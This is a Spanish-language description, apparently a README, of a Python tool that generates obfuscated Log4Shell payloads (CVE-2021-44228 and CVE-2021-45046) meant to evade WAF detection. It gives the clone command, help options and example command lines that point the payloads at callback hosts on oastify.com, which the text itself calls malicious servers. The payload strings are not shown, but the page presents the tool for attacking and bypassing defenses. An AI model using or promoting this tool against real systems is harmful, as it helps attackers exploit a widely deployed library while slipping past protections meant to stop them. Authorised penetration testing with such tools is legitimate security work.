
Generar payloads ofuscados primarios o secundarios de CVE-2021-44228 o CVE-2021-45046 para evadir la detección del WAF.
Log4Shell-obfuscated-payloads-generator puede generar cargas primarias ofuscadas o cargas secundarias ofuscadas de CVE-2021-44228 o CVE-2021-45046 para evadir la detección de WAF.
La idea de diseño de Log4Shell-obfuscated-payloads-generator
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
Log4Shell-obfuscated-payloads-generator funciona listo para usar con Python versión 3.x en cualquier plataforma.
Para obtener una lista de opciones básicas usa:
python3 Log4Shell-obfuscated-payloads-generator.py -h
Para obtener ejemplos de uso usa:
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h: obtener una lista de opciones básicas

-hh: obtener ejemplos de uso

Con una sola opción para generar cargas, la opción -s especifica el servidor malicioso:
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

Con múltiples opciones para generar cargas, la opción -s especifica un servidor malicioso:
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

Sin especificar un servidor malicioso con la opción -s, el marcador de posición {{callback_host}} se conservará en las cargas generadas:
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
